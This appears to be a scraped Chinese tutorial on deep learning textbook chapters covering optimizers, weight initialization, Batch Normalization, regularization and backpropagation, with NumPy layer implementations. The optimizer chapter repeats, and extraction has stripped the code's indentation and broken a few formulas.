    和前面的 SGD 一样,$\mathbf W$ 表示要更新的权重参数,$\frac{\partial L}{\partial \mathbf W}$表示损失函数关于 $\mathbf W$ 的梯度,$\eta$ 表示学习率。这里新出现了变量 $\mathbf h$,保存了以前的所有梯度值的平方和($\odot$ 表示对应矩阵元素的乘法)。然后,在更新参数时,通过乘以 $\frac{1}{\sqrt{\mathbf h}}$,就可以调整学习的尺度。

    AdaGrad 会记录过去所有梯度的平方和。因此,学习越深入,更新的幅度就越小。实际上,如果无止境地学习,更新量就会变为 0,完全不再更新。为了改善这个问题,可以使用 RMSProp 方法。RMSProp 方法并不是将过去所有的梯度一视同仁地相加,而是逐渐地遗忘过去的梯度,在做加法运算时将新梯度的信息更多地反映出来。这种操作从专业上讲,称为“指数移动平均”,呈指数函数式地减小过去的梯度的尺度。

    class AdaGrad:
    def __init__(self, lr=0.01):
    self.lr = lr
    self.h = None


    def update(self, params, grads):
    if self.h is None:
    self.h = {}
    for key, val in params.items():
    self.h[key] = np.zeros_like(val)

    for key in params.keys():
    self.h[key] += grads[key] * grads[key]
    params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)

    6.1.6 Adam

    Adam 是 2015 年提出的新方法。它的理论有些复杂,直观地讲,就是融合了 Momentum 和 AdaGrad 的方法。通过组合前面两个方法的优点,有望实现参数空间的高效搜索。此外,进行超参数的“偏置校正”也是 Adam 的特征。

    Adam 会设置 3 个超参数。一个是学习率(论文中以 $\alpha$ 出现),另外两个是一次 momentum 系数 $\beta_1$ 和二次 momentum 系数 $\beta_2$。根据论文,标准的设定值是 $\beta_1$ 为 0.9,$\beta_2$ 为 0.999。设置了这些值后,大多数情况下都能顺利运行。

    class Adam:
    """Adam (http://arxiv.org/abs/1412.6980v8)"""
    def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
    self.lr = lr
    self.beta1 = beta1
    self.beta2 = beta2
    self.iter = 0
    self.m = None
    self.v = None


    def update(self, params, grads):
    if self.m is None:
    self.m, self.v = {}, {}
    for key, val in params.items():
    self.m[key] = np.zeros_like(val)
    self.v[key] = np.zeros_like(val)
    self.iter += 1
    lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)
    for key in params.keys():
    self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
    self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
    params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)

    很多研究中至今仍在使用 SGD。Momentum 和 AdaGrad 也是值得一试的方法。最近,很多研究人员和技术人员都喜欢用 Adam。

    6.2 权重的初始值

    6.2.1 可以将权重初始值设为 0 吗

    不行。为了防止“权重均一化”(严格地讲,是为了瓦解权重的对称结构),必须随机生成初始值。

    6.2.2 隐藏层的激活值的分布

    随着输出不断地靠近 0(或者靠近 1),它的导数的值逐渐接近 0。因此,偏向 0 和 1 的数据分布会造成反向传播中梯度的值不断变小,最后消失。这个问题称为梯度消失(gradient vanishing)。层次加深的深度学习中,梯度消失的问题可能会更加严重。

    现在,在一般的深度学习框架中,Xavier 初始值已被作为标准使用。比如,Caffe 框架中,通过在设定权重初始值时赋予 xavier 参数,就可以使用 Xavier 初始值。

    Xavier 初始值:与前一层有 $n$ 个节点连接时,初始值使用标准差为 $\frac{1}{\sqrt n}$ 的分布。

    node_num = 100 # 前一层的节点数
    w = np.random.randn(node_num, node_num) / np.sqrt(node_num)

    png

    6.2.3 ReLU 的权重初始值

    Xavier 初始值是以激活函数是线性函数为前提而推导出来的。因为 sigmoid 函数和 tanh 函数左右对称,且中央附近可以视作线性函数,所以适合使用 Xavier 初始值。但当激活函数使用 ReLU 时,一般推荐使用 ReLU 专用的初始值,也就是 Kaiming He 等人推荐的初始值,也称为“He 初始值”。

    当前一层的节点数为 $n$ 时,He 初始值使用标准差为 $\sqrt\frac{2}{n}$ 的高斯分布。当 Xavier 初始值是 $\frac{1}{n}$ 时,(直观上)可以解释为,因为 ReLU 的负值区域的值为 0,为了使它更有广度,所以需要 2 倍的系数。

    6.3 Batch Normalization

    • 到如果设定了合适的权重初始值,则各层的激活值分布会有适当的广度,从而可以顺利地进行学习

    • Batch Normalization 为了使各层拥有适当的广度,“强制性”地调整激活值的分布。

    Batch Normalization 的优点:

    • 可以使学习快速进行(可以增大学习率)。

    • 不那么依赖初始值(对于初始值不用那么神经质)。

    • 抑制过拟合(降低 Dropout 等的必要性)。

    6.3.1 Batch Normalization 的算法

    Batch Norm,顾名思义,以进行学习时的 mini-batch 为单位,按 minibatch 进行正规化。具体而言,就是进行使数据分布的均值为 0、方差为 1 的正规化。

    对于 mini-batch 的 $m$ 个输入数据的集合 $B$:

    $\mu_B \leftarrow \frac{1}{m}\sum^m_{i=1}x_i$,求均值

    $\sigma^2_B\leftarrow \frac{1}{m}\summ_{i=1}\left(x_i-\mu_B\right)2$,求方差

    $\hat x_i\leftarrow\frac{x_i-\mu_B}{\sqrt{\sigma^2_B+\varepsilon}}$,$\varepsilon$ 是一个微小值,如 $10^{-7}$ 等,防止出现除以 0 的情况。

    将 mini-batch 的输入数据 ${x_1, x_2, …, x_m}$ 变换为均值为 0,方差为 1 的数据 ${\hat x_1,\hat x_2,…,\hat x_m}$,接着,Batch Norm 层会对正规化后的数据进行缩放和平移的变换:

    $$y_i\leftarrow\gamma\hat x_i+\beta$$

    这里,$\gamma$ 和 $\beta$ 是参数。一开始 $\gamma = 1, \beta = 0$,然后再通过学习调整到合适的值。

    6.4 正则化

    6.4.1 过拟合

    • 模型拥有大量参数、表现力强。

    • 训练数据少。

    6.4.2 权值衰减

    权值衰减是一直以来经常被使用的一种抑制过拟合的方法。该方法通过在学习的过程中对大的权重进行惩罚,来抑制过拟合。

    损失函数加上权重的平方范数(L2 范数)。这样一来,就可以抑制权重变大。

    L2 范数相当于各个元素的平方和。用数学式表示的话,假设有权重 $\mathbf W= (w_1, w_2, … , w_n)$,则 L2 范数可用 $\sqrt{w2_1+w2_2+…+w^2_n}$ 计算出来。除了 L2 范数,还有 L1 范数、L ∞范数等。L1 范数是各个元素的绝对值之和,相当于 $|w1| + |w2| + … + |wn|$。L∞范数也称为 Max 范数,相当于各个元素的绝对值中最大的那一个。L2 范数、L1 范数、L∞范数都可以用作正则化项,它们各有各的特点,不过这里我们要实现的是比较常用的 L2 范数。

    6.4.3 Dropout

    Dropout 是一种在学习的过程中随机删除神经元的方法。训练时,随机选出隐藏层的神经元,然后将其删除。

    class Dropout:
    def __init__(self, dropout_ratio=0.5):
    self.dropout_ratio = dropout_ratio
    self.mask = None


    def forward(self, x, train_flg=True):
    if train_flg:
    self.mask = np.random.rand(*x.shape) > self.dropout_ratio
    return x * self.mask
    else:
    return x * (1.0 - self.dropout_ratio)


    def backward(self, dout):
    return dout * self.mask

    6.5 超参数的验证

    超参数(hyper-parameter)也经常出现。这里所说的超参数是指,比如各层的神经元数量、batch 大小、参数更新时的学习率或权值衰减等。如果这些超参数没有设置合适的值,模型的性能就会很差。

    6.5.1 验证数据

    如果使用测试数据调整超参数,超参数的值会对测试数据发生过拟合。换句话说,用测试数据确认超参数的值的“好坏”,就会导致超参数的值被调整为只拟合测试数据。

    调整超参数时,必须使用超参数专用的确认数据。用于调整超参数的数据,一般称为验证数据(validation data)

    如果是 MNIST 数据集,获得验证数据的最简单的方法就是从训练数据中事先分割 20%作为验证数据:

    (x_train, t_train), (x_test, t_test) = load_mnist()
    # 打乱训练数据
    x_train, t_train = shuffle_dataset(x_train, t_train)
    # 分割验证数据
    validation_rate = 0.20
    validation_num = int(x_train.shape[0] * validation_rate)
    x_val = x_train[:validation_num]
    t_val = t_train[:validation_num]
    x_train = x_train[validation_num:]
    t_train = t_train[validation_num:]

    6.5.2 超参数的最优化

    步骤 0 设定超参数的范围。

    步骤 1 从设定的超参数范围中随机采样。

    步骤 2 使用步骤 1 中采样到的超参数的值进行学习,通过验证数据评估识别精度(但是要将 epoch 设置得很小)。

    步骤 3 重复步骤 1 和步骤 2(100 次等),根据它们的识别精度的结果,缩小超参数的范围

    6.6 小结

    • 参数的更新方法,除了 SGD 之外,还有 Momentum、AdaGrad、Adam 等方法。

    • 权重初始值的赋值方法对进行正确的学习非常重要。

    • 作为权重初始值,Xavier 初始值、He 初始值等比较有效。

    • 通过使用 Batch Normalization,可以加速学习,并且对初始值变得健壮。

    • 抑制过拟合的正则化技术有权值衰减、Dropout 等。

    • 逐渐缩小“好值”存在的范围是搜索超参数的一个有效方法。

    ]]>
    + 正文

    6.1 参数的更新

    6.1.2 SGD

    $$\mathbf W\leftarrow \mathbf W -\eta\frac{\partial L}{\partial \mathbf W}$$

    1
    2
    3
    4
    5
    6
    7
    class SGD:
    def __init__(self, lr=0.01):
    self.lr = lr

    def update(self, params, grads):
    for key in params.keys():
    params[key] -= self.lr * grads[key]

    6.1.3 SGD 的缺点

    png

    如果函数的形状非均向(anisotropic),比如呈延伸状,搜索的路径就会非常低效。因此,我们需要比单纯朝梯度方向前进的 SGD 更聪明的方法。SGD 低效的根本原因是,梯度的方向并没有指向最小值的方向(指向极小值的方向)。

    6.1.4 Momentum

    png

    $$v\leftarrow \alpha v -\eta\frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W \leftarrow \mathbf W + v$$

    • Momentum 方法给人的感觉就像是小球在地面上滚动。

    • 新出现了一个变量 $v$,对应物理上的速度。

    • $\alpha v$ 这一项。在物体不受任何力时,该项承担使物体逐渐减速的任务($\alpha$ 设定为 0.9 之类的值),对应物理上的地面摩擦或空气阻力。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    class Momentum:
    def __init__(self, lr=0.01, momentum=0.9):
    self.lr = lr
    self.momentum = momentum
    self.v = None


    def update(self, params, grads):
    if self.v is None:
    self.v = {}
    for key, val in params.items():
    self.v[key] = np.zeros_like(val)

    for key in params.keys():
    self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
    params[key] += self.v[key]

    6.1.5 AdaGrad

    在神经网络的学习中,学习率(数学式中记为 $\eta$)的值很重要。

    • 学习率过小,会导致学习花费过多时间;

    • 学习率过大,则会导致学习发散而不能正确进行。

    在关于学习率的有效技巧中,有一种被称为**学习率衰减(learning rate decay)**的方法,即随着学习的进行,使学习率逐渐减小。实际上,一开始“多”学,然后逐渐“少”学的方法,在神经网络的学习中经常被使用。

    $$\mathbf h\leftarrow \mathbf h + \frac{\partial L}{\partial \mathbf W} \odot \frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W\leftarrow \mathbf W - \eta\frac{1}{\sqrt{\mathbf h}}\frac{\partial L}{\partial \mathbf W}$$

    和前面的 SGD 一样,$\mathbf W$ 表示要更新的权重参数,$\frac{\partial L}{\partial \mathbf W}$表示损失函数关于 $\mathbf W$ 的梯度,$\eta$ 表示学习率。这里新出现了变量 $\mathbf h$,保存了以前的所有梯度值的平方和($\odot$ 表示对应矩阵元素的乘法)。然后,在更新参数时,通过乘以 $\frac{1}{\sqrt{\mathbf h}}$,就可以调整学习的尺度。

    AdaGrad 会记录过去所有梯度的平方和。因此,学习越深入,更新的幅度就越小。实际上,如果无止境地学习,更新量就会变为 0,完全不再更新。为了改善这个问题,可以使用 RMSProp 方法。RMSProp 方法并不是将过去所有的梯度一视同仁地相加,而是逐渐地遗忘过去的梯度,在做加法运算时将新梯度的信息更多地反映出来。这种操作从专业上讲,称为“指数移动平均”,呈指数函数式地减小过去的梯度的尺度。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    class AdaGrad:
    def __init__(self, lr=0.01):
    self.lr = lr
    self.h = None


    def update(self, params, grads):
    if self.h is None:
    self.h = {}
    for key, val in params.items():
    self.h[key] = np.zeros_like(val)

    for key in params.keys():
    self.h[key] += grads[key] * grads[key]
    params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)

    6.1.6 Adam

    Adam 是 2015 年提出的新方法。它的理论有些复杂,直观地讲,就是融合了 Momentum 和 AdaGrad 的方法。通过组合前面两个方法的优点,有望实现参数空间的高效搜索。此外,进行超参数的“偏置校正”也是 Adam 的特征。

    Adam 会设置 3 个超参数。一个是学习率(论文中以 $\alpha$ 出现),另外两个是一次 momentum 系数 $\beta_1$ 和二次 momentum 系数 $\beta_2$。根据论文,标准的设定值是 $\beta_1$ 为 0.9,$\beta_2$ 为 0.999。设置了这些值后,大多数情况下都能顺利运行。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    class Adam:
    """Adam (http://arxiv.org/abs/1412.6980v8)"""
    def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
    self.lr = lr
    self.beta1 = beta1
    self.beta2 = beta2
    self.iter = 0
    self.m = None
    self.v = None


    def update(self, params, grads):
    if self.m is None:
    self.m, self.v = {}, {}
    for key, val in params.items():
    self.m[key] = np.zeros_like(val)
    self.v[key] = np.zeros_like(val)
    self.iter += 1
    lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)
    for key in params.keys():
    self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
    self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
    params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)

    很多研究中至今仍在使用 SGD。Momentum 和 AdaGrad 也是值得一试的方法。最近,很多研究人员和技术人员都喜欢用 Adam。

    6.2 权重的初始值

    6.2.1 可以将权重初始值设为 0 吗

    不行。为了防止“权重均一化”(严格地讲,是为了瓦解权重的对称结构),必须随机生成初始值。

    6.2.2 隐藏层的激活值的分布

    随着输出不断地靠近 0(或者靠近 1),它的导数的值逐渐接近 0。因此,偏向 0 和 1 的数据分布会造成反向传播中梯度的值不断变小,最后消失。这个问题称为梯度消失(gradient vanishing)。层次加深的深度学习中,梯度消失的问题可能会更加严重。

    现在,在一般的深度学习框架中,Xavier 初始值已被作为标准使用。比如,Caffe 框架中,通过在设定权重初始值时赋予 xavier 参数,就可以使用 Xavier 初始值。

    Xavier 初始值:与前一层有 $n$ 个节点连接时,初始值使用标准差为 $\frac{1}{\sqrt n}$ 的分布。

    1
    2
    node_num = 100 # 前一层的节点数
    w = np.random.randn(node_num, node_num) / np.sqrt(node_num)

    png

    6.2.3 ReLU 的权重初始值

    Xavier 初始值是以激活函数是线性函数为前提而推导出来的。因为 sigmoid 函数和 tanh 函数左右对称,且中央附近可以视作线性函数,所以适合使用 Xavier 初始值。但当激活函数使用 ReLU 时,一般推荐使用 ReLU 专用的初始值,也就是 Kaiming He 等人推荐的初始值,也称为“He 初始值”。

    当前一层的节点数为 $n$ 时,He 初始值使用标准差为 $\sqrt\frac{2}{n}$ 的高斯分布。当 Xavier 初始值是 $\frac{1}{n}$ 时,(直观上)可以解释为,因为 ReLU 的负值区域的值为 0,为了使它更有广度,所以需要 2 倍的系数。

    6.3 Batch Normalization

    • 到如果设定了合适的权重初始值,则各层的激活值分布会有适当的广度,从而可以顺利地进行学习

    • Batch Normalization 为了使各层拥有适当的广度,“强制性”地调整激活值的分布。

    Batch Normalization 的优点:

    • 可以使学习快速进行(可以增大学习率)。

    • 不那么依赖初始值(对于初始值不用那么神经质)。

    • 抑制过拟合(降低 Dropout 等的必要性)。

    6.3.1 Batch Normalization 的算法

    Batch Norm,顾名思义,以进行学习时的 mini-batch 为单位,按 minibatch 进行正规化。具体而言,就是进行使数据分布的均值为 0、方差为 1 的正规化。

    对于 mini-batch 的 $m$ 个输入数据的集合 $B$:

    $\mu_B \leftarrow \frac{1}{m}\sum^m_{i=1}x_i$,求均值

    $\sigma^2_B\leftarrow \frac{1}{m}\summ_{i=1}\left(x_i-\mu_B\right)2$,求方差

    $\hat x_i\leftarrow\frac{x_i-\mu_B}{\sqrt{\sigma^2_B+\varepsilon}}$,$\varepsilon$ 是一个微小值,如 $10^{-7}$ 等,防止出现除以 0 的情况。

    将 mini-batch 的输入数据 ${x_1, x_2, …, x_m}$ 变换为均值为 0,方差为 1 的数据 ${\hat x_1,\hat x_2,…,\hat x_m}$,接着,Batch Norm 层会对正规化后的数据进行缩放和平移的变换:

    $$y_i\leftarrow\gamma\hat x_i+\beta$$

    这里,$\gamma$ 和 $\beta$ 是参数。一开始 $\gamma = 1, \beta = 0$,然后再通过学习调整到合适的值。

    6.4 正则化

    6.4.1 过拟合

    • 模型拥有大量参数、表现力强。

    • 训练数据少。

    6.4.2 权值衰减

    权值衰减是一直以来经常被使用的一种抑制过拟合的方法。该方法通过在学习的过程中对大的权重进行惩罚,来抑制过拟合。

    损失函数加上权重的平方范数(L2 范数)。这样一来,就可以抑制权重变大。

    L2 范数相当于各个元素的平方和。用数学式表示的话,假设有权重 $\mathbf W= (w_1, w_2, … , w_n)$,则 L2 范数可用 $\sqrt{w2_1+w2_2+…+w^2_n}$ 计算出来。除了 L2 范数,还有 L1 范数、L ∞范数等。L1 范数是各个元素的绝对值之和,相当于 $|w1| + |w2| + … + |wn|$。L∞范数也称为 Max 范数,相当于各个元素的绝对值中最大的那一个。L2 范数、L1 范数、L∞范数都可以用作正则化项,它们各有各的特点,不过这里我们要实现的是比较常用的 L2 范数。

    6.4.3 Dropout

    Dropout 是一种在学习的过程中随机删除神经元的方法。训练时,随机选出隐藏层的神经元,然后将其删除。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    class Dropout:
    def __init__(self, dropout_ratio=0.5):
    self.dropout_ratio = dropout_ratio
    self.mask = None


    def forward(self, x, train_flg=True):
    if train_flg:
    self.mask = np.random.rand(*x.shape) > self.dropout_ratio
    return x * self.mask
    else:
    return x * (1.0 - self.dropout_ratio)


    def backward(self, dout):
    return dout * self.mask

    6.5 超参数的验证

    超参数(hyper-parameter)也经常出现。这里所说的超参数是指,比如各层的神经元数量、batch 大小、参数更新时的学习率或权值衰减等。如果这些超参数没有设置合适的值,模型的性能就会很差。

    6.5.1 验证数据

    如果使用测试数据调整超参数,超参数的值会对测试数据发生过拟合。换句话说,用测试数据确认超参数的值的“好坏”,就会导致超参数的值被调整为只拟合测试数据。

    调整超参数时,必须使用超参数专用的确认数据。用于调整超参数的数据,一般称为验证数据(validation data)

    如果是 MNIST 数据集,获得验证数据的最简单的方法就是从训练数据中事先分割 20%作为验证数据:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    (x_train, t_train), (x_test, t_test) = load_mnist()
    # 打乱训练数据
    x_train, t_train = shuffle_dataset(x_train, t_train)
    # 分割验证数据
    validation_rate = 0.20
    validation_num = int(x_train.shape[0] * validation_rate)
    x_val = x_train[:validation_num]
    t_val = t_train[:validation_num]
    x_train = x_train[validation_num:]
    t_train = t_train[validation_num:]

    6.5.2 超参数的最优化

    步骤 0 设定超参数的范围。

    步骤 1 从设定的超参数范围中随机采样。

    步骤 2 使用步骤 1 中采样到的超参数的值进行学习,通过验证数据评估识别精度(但是要将 epoch 设置得很小)。

    步骤 3 重复步骤 1 和步骤 2(100 次等),根据它们的识别精度的结果,缩小超参数的范围

    6.6 小结

    • 参数的更新方法,除了 SGD 之外,还有 Momentum、AdaGrad、Adam 等方法。

    • 权重初始值的赋值方法对进行正确的学习非常重要。

    • 作为权重初始值,Xavier 初始值、He 初始值等比较有效。

    • 通过使用 Batch Normalization,可以加速学习,并且对初始值变得健壮。

    • 抑制过拟合的正则化技术有权值衰减、Dropout 等。

    • 逐渐缩小“好值”存在的范围是搜索超参数的一个有效方法。

    ]]>
    @@ -8144,7 +8144,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-5-%E8%AF%AF%E5%B7%AE%E5%8F%8D%E5%90%91%E4%BC%A0%E6%92%AD%E6%B3%95/ - 正文

    理解误差反向传播法:

    • 基于数学式

    • 基于计算图

    5.1 计算图

    5.1.1 用计算图求解

    “从左向右进行计算”是一种正方向上的传播,简称为正向传播(forward propagation)。正向传播是从计算图出发点到结束点的传播。

    既然有正向传播这个名称,当然也可以考虑反向(从图上看的话,就是从右向左)的传播。实际上,这种传播称为反向传播(backward propagation)。反向传播将在接下来的导数计算中发挥重要作用。

    5.1.2 局部计算

    png

    例如苹果和其他很多东西的求和运算(4000 + 200 → 4200)并不关心 4000 这个数字是如何计算而来的,只要把两个数字相加就可以了。换言之,各个节点处只需进行与自己有关的计算(在这个例子中是对输入的两个数字进行加法运算),不用考虑全局。

    5.1.3 为何用计算图解题

    png

    这里,假设我们想知道苹果价格的上涨会在多大程度上影响最终的支付金额,即求“支付金额关于苹果的价格的导数”。设苹果的价格为 $x$,支付金额为 $L$,则相当于求

    $$\frac{\partial L}{\partial x}$$

    这个导数的值表示当苹果的价格稍微上涨时,支付金额会增加多少。

    反向传播从右向左传递导数的值(1→1.1→2.2)。从这个结果中可知,“支付金额关于苹果的价格的导数”的值是 2.2。这意味着,如果苹果的价格上涨 1 日元,最终的支付金额会增加 2.2 日元(严格地讲,如果苹果的价格增加某个微小值,则最终的支付金额将增加那个微小值的 2.2 倍)。

    5.2 链式法则

    计算图的正向传播将计算结果正向(从左到右)传递,其计算过程是我们日常接触的计算过程,所以感觉上可能比较自然。

    反向传播将局部导数向正方向的反方向(从右到左)传递,一开始可能会让人感到困惑。传递这个局部导数的原理,是基于**链式法则(chain rule)**的。

    5.2.2 什么是链式法则

    先从复合函数说起。复合函数是由多个函数构成的函数。比如,$z=(x+y)^2$ 是由下式所示的两个式子构成的。

    $$z=t^2\t=x+y$$

    链式法则是关于复合函数的导数的性质,定义如下:

    如果某个函数由复合函数表示,则该复合函数的导数可以用构成复合函数的各个函数的导数的乘积表示。

    $$\frac{\partial z}{\partial x} = \frac{\partial z}{\partial t} \frac{\partial t}{\partial x} = 2t \cdot 1 = 2(x+y)$$

    5.2.3 链式法则和计算图

    png

    根据计算图的反向传播的结果,$\frac{\partial z}{\partial x}=2(x+y)$,计算图的反向传播是基于链式法则成立的。

    5.3 反向传播

    5.3.1 加法节点的反向传播

    png

    考虑 $z=x+y$,$\frac{\partial z}{\partial x}=1,\frac{\partial z}{\partial y}=1$

    $z=x+y$ 的计算位于这个大型计算图的某个地方,从上游会传来 $\frac{\partial L}{\partial z}$ 的值,并向下游传递 $\frac{\partial L}{\partial x}$ 和 $\frac{\partial L}{\partial y}$。

    5.3.2 乘法节点的反向传播

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

    png

    加法的反向传播只是将上游的值传给下游,并不需要正向传播的输入信号。但是,乘法的反向传播需要正向传播时的输入信号值。因此,实现乘法节点的反向传播时,要保存正向传播的输入信号。

    5.3.3 苹果的例子

    这里要解的问题是苹果的价格、苹果的个数、消费税这 3 个变量各自如何影响最终支付的金额。这个问题相当于求“支付金额关于苹果的价格的导数”“支付金额关于苹果的个数的导数”“支付金额关于消费税的导数”。

    5.4 简单层的实现

    把要实现的计算图的乘法节点称为“乘法层”(MulLayer),加法节点称为“加法层”(AddLayer)。

    5.4.1 乘法层的实现

    层的实现中有两个共通的方法(接口)forward()backward()forward()对应正向传播,backward()对应反向传播。

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

    class MulLayer:
    def __init__(self):
    """
    定义 x 和 y(保存正向传播的输入信号)
    """
    self.x = None
    self.y = None


    def forward(self, x, y):
    self.x = x
    self.y = y
    out = x * y

    return out


    def backward(self, dout):
    dx = dout * self.y # 翻转 x 和 y
    dy = dout * self.x
    return dx, dy
    apple = 100
    apple_num = 2
    tax = 1.1

    # layer
    mul_apple_layer = MulLayer()
    mul_tax_layer = MulLayer()

    # forward
    apple_price = mul_apple_layer.forward(apple, apple_num) # 苹果总价
    price = mul_tax_layer.forward(apple_price, tax) # 加上税收总价
    print(price) # 220
    220.00000000000003

    此外,关于各个变量的导数可由backward()求出。

    # backward
    dprice = 1
    dapple_price, dtax = mul_tax_layer.backward(dprice)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price)
    print(dapple, dapple_num, dtax) # 2.2 110 200
    2.2 110.00000000000001 200

    5.4.2 加法层的实现

    class AddLayer:
    def __init__(self):
    """
    加法层不需要特意进行初始化,所以__init__()中什么也不运行
    """
    pass


    def forward(self, x, y):
    out = x + y
    return out


    def backward(self, dout):
    dx = dout * 1
    dy = dout * 1
    return dx, dy

    使用加法层和乘法层,实现上图所示的购买 2 个苹果和 3 个橘子。

    apple = 100
    apple_num = 2
    orange = 150
    orange_num = 3
    tax = 1.1

    # layer 生成必要的层
    mul_apple_layer = MulLayer()
    mul_orange_layer = MulLayer()
    add_apple_orange_layer = AddLayer()
    mul_tax_layer = MulLayer()

    # forward 合适的顺序调用正向传播的 forward() 方法
    apple_price = mul_apple_layer.forward(apple, apple_num) #(1)
    orange_price = mul_orange_layer.forward(orange, orange_num) #(2)
    all_price = add_apple_orange_layer.forward(apple_price, orange_price) #(3)
    price = mul_tax_layer.forward(all_price, tax) #(4)

    # backward 与正向传播相反的顺序调用反向传播的 backward() 方法
    dprice = 1
    dall_price, dtax = mul_tax_layer.backward(dprice) #(4)
    dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price) #(3)
    dorange, dorange_num = mul_orange_layer.backward(dorange_price) #(2)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price) #(1)

    print(price) # 715
    print(dapple_num, dapple, dorange, dorange_num, dtax) # 110 2.2 3.3 165 650
    715.0000000000001110.00000000000001 2.2 3.3000000000000003 165.0 650

    5.5 激活函数层的实现

    5.5.1 ReLU 层

    ReLU 由下式表示:

    $$y=\left{\begin{matrix}x\quad (x>0)\0\quad(x\le0)\end{matrix}\right.$$

    $$\frac{\partial y}{\partial x}=\left{\begin{matrix}1\quad (x>0)\0\quad(x\le0)\end{matrix}\right.$$

    class Relu:
    def __init__(self):
    self.mask = None


    def forward(self, x):
    """
    mask 是由 True/False 构成的 NumPy 数组,
    它会把正向传播时的输入 x 的元素中小于等于 0 的地方保存为 True,
    其他地方(大于 0 的元素)保存为 False
    """
    self.mask = (x <= 0)
    out = x.copy()
    out[self.mask] = 0

    return out


    def backward(self, dout):
    """
    如果正向传播时的输入值小于等于 0,则反向传播的值为 0
    反向传播中会使用正向传播时保存的 mask,
    将从上游传来的 dout 的 mask 中的元素为 True 的地方设为 0
    """
    dout[self.mask] = 0
    dx = dout

    return dx

    5.5.2 Sigmoid 层

    $$
    \begin{eqnarray}
    y &= \frac{1}{1+\exp(-x)} \
    y’ &= \left(\frac{1}{1+\exp(-x)}\right)'\
    &= -y^2\left[-\left(\exp(-x)\right)\right]\
    &= y^2\exp(-x)\
    &= y(1-y)
    \end{eqnarray}
    $$

    class Sigmoid:
    def __init__(self):
    self.out = None


    def forward(self, x):
    """
    正向传播时将输出保存在了实例变量 out 中
    """
    out = 1 / (1 + np.exp(-x))
    self.out = out

    return out


    def backward(self, dout):
    """
    反向传播时,使用该变量 out 进行计算
    """
    dx = dout * (1.0 - self.out) * self.out

    return dx

    5.6 Affine/Softmax 层的实现

    5.6.1 Affine 层

    神经网络的正向传播中进行的矩阵的乘积运算在几何学领域被称为“仿射变换”A。因此,这里将进行仿射变换的处理实现为“Affine 层”。

    仿射层(Affine Layer)
    神经网络中的一个全连接层。仿射(Affine)的意思是前面一层中的每一个神经元都连接到当前层中的每一个神经元。在许多方面,这是神经网络的「标准」层。仿射层通常被加在卷积神经网络或循环神经网络做出最终预测前的输出的顶层。仿射层的一般形式为 $y=f(Wx+b)$,其中 $x$ 是层输入,$w$ 是参数,$b$ 是一个偏差矢量,$f$ 是一个非线性激活函数。

    5.6.2 批版本的 Affine 层

    png

    1. $\frac{\partial L}{\partial \mathbf X} = \frac{\partial L}{\partial \mathbf Y}\cdot \mathbf W^T$

    2. $\frac{\partial L}{\partial \mathbf W} = \mathbf X^T\cdot \frac{\partial L}{\partial \mathbf Y}$

    3. $\frac{\partial L}{\partial \mathbf B} = \frac{\partial L}{\partial \mathbf Y}$ 的第一个轴(第 0 轴)方向上的和

    class Affine:
    def __init__(self, W, b):
    self.W = W
    self.b = b
    self.x = None
    self.dW = None
    self.db = None


    def forward(self, x):
    self.x = x
    out = np.dot(x, self.W) + self.b

    return out


    def backward(self, dout):
    dx = np.dot(dout, self.W.T) # (1)
    self.dW = np.dot(self.x.T, dout) # (2)
    self.db = np.sum(dout, axis=0) # (3)

    return dx

    5.6.3 Softmax-with-Loss 层

    class SoftmaxWithLoss:
    def __init__(self):
    self.loss = None # 损失
    self.y = None # softmax 的输出
    self.t = None # 监督数据(one-hot vector)


    def forward(self, x, t):
    self.t = t
    self.y = softmax(x)
    self.loss = cross_entropy_error(self.y, self.t)

    return self.loss


    def backward(self, dout=1):
    batch_size = self.t.shape[0]
    dx = (self.y - self.t) / batch_size

    return dx

    5.7 误差反向传播法的实现

    5.7.1 神经网络学习的全貌图

    前提

    神经网络中有合适的权重和偏置,调整权重和偏置以便拟合训练数据的过程称为学习。神经网络的学习分为下面 4 个步骤。

    步骤 1(mini-batch)

    从训练数据中随机选择一部分数据。

    步骤 2(计算梯度)

    计算损失函数关于各个权重参数的梯度。(误差反向传播法会在此步出现)

    步骤 3(更新参数)

    将权重参数沿梯度方向进行微小的更新。

    步骤 4(重复)

    重复步骤 1、步骤 2、步骤 3。

    5.7.2 对应误差反向传播法的神经网络的实现

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from common.layers import *
    from common.gradient import numerical_gradient
    from collections import OrderedDict


    class TwoLayerNet:

